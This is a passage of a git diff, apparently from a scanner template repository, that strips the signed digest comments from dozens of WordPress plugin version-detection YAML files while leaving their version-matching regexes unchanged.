b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c542b17c7fa25346ce46956cf573d141ea436bb242fba304907d777ea5fb7672022100b3dc3c7370cc0c0ba517ebb9755cd2b7a22919a529db449a7ccd8c076cda4ab1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index e8f3a18e74..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022041f6f8568a2683a4be1db198dec9c42ad1ae403f97c1bda0d414081aaee3817902207772e67e3593afdcc79f4b703269bd94457f1555b4662d8378ab4c286a838dab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 21af1f411d..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c40fb474fc4bebbb614510a15ca0c4f7461c5bd7374de4b0867d3d09042ff053022100c4df9b49a660d350016f5e62ae6552a84738934cf52db272ce02e24c5ac3656d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 04c541a239..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220490352b6f58b2dbb6428e9fd2a12b1ba9123b7af0561241d4871d82ace0a251602204b5f5c87508317e89fa59b9427c4b7c31c14392e6ad1766d4e6c01da983b06cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6ddc83b50f..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220381feffca50b23c67a683f04f8e2cd38baac2e013f4b225dfe995f452e3229c70220117b46fbaea57dc0adf3e9c3468502161bbb9607dcc6277eb43fa388a9b61ce6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index e4e5486080..dafbd25c9e 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204542fb7bc61b3bb8501e326edf84819c4d2eb38687d0569a00b89f49cc53233002200dd35897eb5d01c618a0d8617d5d339afbd77951208d4e89ecbaed6464e499a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 8a33377658..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220783a2ed35bd4b3ec5b72e66ef753c55055c997de64f43fe38fcd01fbb1e4c396022038a1ad33efc338e1fe2d4f535e4c51ac486396692f3561504923d454694405cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index e680fcce95..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220779692333bd053d819e0ba06d97f5e5b8d54edf670d7a96bfaa653a5bb6a9b0f022100d667dcbed401698a7124c75510e5b1cd85b849d7eccf62e66774f8e5ed7a8f51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 6527e86516..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aa4285b23f2b40d353500dd5a653fc116a94dba11349509a84d19ab5e5c5acb00220448d4665d7be8b6390e759539f43bd79e171c03a108dd1deefd9ebf7333383f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index db7f1fe112..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ed7a25db7035327d790f83d1fbb013fab8b4b49cfcbef8ff2716bbe37a80cc1f022100d5528292c0f0f175d003ca4cf6ec162658cdea15ab14d6b9bda9e061bb70f27a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index be5aa9cc9d..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220338a1e7eaceb66622f7774494791561194da9c5bdcf5f2e3cc8dfd5b1e5c91d002206429600c6bdd6c07161dcd6004973b2c07f2fb949ebb47119dca431e0b7c20c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 3e55be02b6..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022055ae05f1e4b07fcd0b54025d9b3a2533d9a22410364a2364993289ea9a543b9f02200f7716f4a1a609bb01cdae232310d977dcd6735ce4f897bbb1e011220c95f688:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ab375e0e63..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b7d7310c00b5507b9db809b4fad5d1729439744b260ed83a9cca3036a9c4cf81022100ea2746869da96b4c5224bf62c7e0811182951430144fd300cbc97aa667a0e89f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 5c0d53005a..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fecfbd9aaf59d46575a0743d6b6ec6f0be350c5aeeb69475baba3fc577b2a77e02202b7dc68a62a40d4c372ab21de01f477cbc36d0b1b1fb4d9fc53eda60ea5bcfb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index e606bb9f01..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220487c28e7b6db4fd6f68f3b3a29724726cd6d52e888702a19bb68ac89de9656210220132953b930570f3273d0741127fd20aaaa933159e7b331137ca61fd1c2e5d096:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index f6c0d979f4..fe4c223cba 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d75a0ee427501942ac9ad05a8dd8f37529d8d94c3382a6bcf9288788a5054340022100f30f37468b8ecdae174021404e90ddd5b5e04a4111c638c12348e7f580807dd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 743dc050ad..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022061c5137ed28a04a96dddb94ba00bcd16d512836d5b144c89eea4c2efb875c2580220221e06a89db312b491d52154b7b477d7da09d44e2e197d76494c3e4dd9914aec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 2e56faf5c8..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cc0ab63f8ee4fc370aeda7519f49dde626bda9bc7e61f922a98009f4c6c63b86022074676b4a31d1015b2c10e52f034a9adfd90eda7e6ad19cc4dc1d9e217cd4f17d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index a3afb2f119..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022057e7f80a5e2cfebe36c737bceb5b5479b76e36009076f112be16da1814558fb002201c237b4f88c5e76a27406cf0950bc6dbe07158d69fa8038ae0bfd10bdb5ee862:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 9078bbf0c8..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210085af9ca88cb3a82896ee48ab027c59efd7797cb55d8db087d7d501b08275bae402201dc933107e83edc2d5e12c141042905d8dfacafff217d5372ee37308a4bd009a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index f2043dcc75..5ea77f898d 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ff3fa147033e1a8146697dbfe1a27338ed2cb9e801b6ad8317e7fcefd611ce2302204ffac7e625873cdbcc7545dcbcbf7737a1a274bc5c6b5b5234c017fce1193659:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 45b3dc0fb5..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205bba40a727f6ee8be125ea572c7e138478967af62782e2f28472a73fd4a948de02210099af0d856662cbc6c10fc09653fe6b3e611e24aa7c0a568b5aab9555beb2a079:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/extendify.yaml b/http/technologies/wordpress/plugins/extendify.yaml index 77e01e0356..554a7ddc52 100644 --- a/http/technologies/wordpress/plugins/extendify.yaml +++ b/http/technologies/wordpress/plugins/extendify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207a6847815dc34463482af1c6b421d712ac2c4ec91c4adc64d1baa15e28462285022100a21a5b0987822e228638c829f0017c96120095ebf6e775e51386efb314cd2372:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index e52f8e56ea..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f6b8ed2ce50d9c63419b43fdc2000c52f49d83025fc28f357a9d21a377f7174d022100fff1e43bd144ae1b466808448df09bedeb985d038671329f4be05bbef3e0248a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index c6c81aaa8e..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b19f3617dcda4fc50a296c7e6f3b22ba2f8fa9130a40ac142694e1b941fe1e6e022061450064a35b3af8feb921d08dd908bca2d8685fe28dd62d49123706f2320123:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 2e091f8aa4..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202333fcf960eecc20f6820d2106d9f1f21d9e266ce130d68aee4b997d8d61d92002201fc840231ddc4af941d6943fa0aee54fb9bef54a505a434b0e7acf65a571904f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index c6b258a7a0..4a3dcbd210 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200a4bddf226dec0a17cbeae709e9a9f5610923ce8601b96dc76ec312e0eac98c502207f49017cd130161aa2a983774a58162b63ffcf88aca327e4e8a5615e35ddf9f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 4d4fc5f81c..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022077e56f07c8a2fbca01bbfe49f53c7729e395b78937e5320398bc0787bd09773602203a6664bcafcc30b906870de975bc874b1c27d9d008165d5c1bec5a47323b1063:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 3ceff962b7..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207b5f38a1bea76695c7890bc168534d1f70830d563b7291f1b6b103151a9d5d0f022028ac19ffba6d11f33ccd60188f9c3905dce68ff6a82c398ba3412060d892ac94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index c812dc716b..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e2e04d54f22520fbde8841bd693cbcb860b5b9f47ec08583c98eb0bde185b26b022069b84720ad523bb4027f618a54e2d4d09cf46cca2e88906c9456f3832daa2c35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 6ffb81a575..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008791d7c2eba95e4d2387e2a782811dcb8e06bc5c71b49aec0aeef88d541cf11702205d84bdd80140c299ea14ea76211d7bb8826d0c68d09767c65b1ea393c2312c79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 65900f81da..ce5dc03713 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202ae79379c44ad371addbc9165df10e5318088ce36eae311f2f84f3855934384002210097d4d117b1615c14a41b49f1d4f6053fc6f3c209ef361c8a55fba5bbc68cf054:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index b630b4edd7..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022077fb7caa895905229c307d6b163d397a727034ce1a0f5d364a113748473291250221008ca5cb2ae819587d9cba85f27514ed28bdbd870f8bdd14557705252736166174:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7696cb7175..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e5384d02f40ca0e5320c519182dd8d9cd7be9bbc4f4f5206a6ac28a10ae1816202204a1683e0ad230a2016201f5213969cdcd295c3cc11f3be07e726f69df96b7e5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index c8f3d7c89d..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220084deeb814d8e1bb5ba9c866420240f57a995ed447fd3523bcfb41490b0b6dc2022100e0d7d81c8434a9aaa40a2c33e75a7965813441550a6fb4c50413bbc31cd0819c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 3cab19ad29..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a75daf0d948d753aabdd3e67b4ff80112e981622447cc30424219547fa0717b7022035596b75933db687828693ee3de9f75a95776076d92a394437284770355304fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b9e323e10b..45260ccfba 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f77888cd5669af867d8b5b7d57829fc00b1aaebdf46684a4fe23f608b83b9aa2022031e1d9ae920c09363ec8bf8051477fd1d6ee9110468d129a6bb262a2f53c614e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7fd1244076..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b832e7f7f6ef846ad7be54a338b9cb10b260bba8402ef19723779336c7e1842f022019cc97e22d8fd2d2630e72ee9bf0bdd2b83332781242e4c7e697936ec3041d89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 9ad8949e31..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206c867db888d5e6f5ee5c1bd182cb4a78d25473fc2efa8df0c58974c3d2eb01fd02201f21d5071606dbf821c901ee5e2e30731b9b5f9ad4cbf8984e7b00370541bdb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 50517b715a..64cfced6cf 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ae57cc3efe74f1c2751879aaf08e0034daaafc4d3ad930d8a621dac7f9cd69800220628232c4d651475ce17e592e187ffccb77c5162654c8066d0fc65948e782ade9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index a4372dd5ff..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b627706cebc1a4248bed04c4f7d225502bdd6ca28d5f95afe8359a9431256a3902207851af73e3f223ce8b1f25162ae036064d2da5877851acd8128e8b8f7221f86c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 6ba5fbe28f..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022065a9b5a9d695e13d046507c87150aec279074a33119d2c66409a6f7503adc4df02210099fe06e389f0b9d9cdd36bb29fa72c6dd857001c2ca4c38b03d2b59b139a59ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 52039be918..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201ce1c54e6cae2d629afe181650860a2aaba907a6b551a3d382179504bce397da022100fbf20f9df2de94c3069a7ffcd0b89896fca90335bd444e29c052bed00227fb58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index c7c0aa30fc..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100977bfafc745b08b3ba00349d1ffe9608cb08e427f1a840413974e6cedab3ae1a022100c12c9630ed98be12c314c371b7d81844cfca9949d6dfd8684cca80428f539a04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 9d9aedb4a6..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022010a5c2d0e92ee350d4b5329602e01a2cbac6d72ee02a794f59158e4d6deb8849022100b94e66a0667ded623289bdf8b405165c343325f7e376c1db26071dabb027c16d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index f31613d97a..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c19162345ac1f3533768f768712e25bd3ef483c8b863013b6f62ea2e59eb6ec5022100a79fe1a5fd6bcd64fffebe66d8117d4e1fd74773f5f103a0dc2998332a0bc639:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 0b06deb1db..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e4eb548644ccf2b02c8f2100d018fc9e01f2dc921f7a12a32550f13c2c449eae0221009a5c5e5d20891c2596fa4cfdb4c42485d9e2e1e4bae086c4f84b2ccd0cccd569:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 777fa97610..ab9a0f1ae3 100644 --- 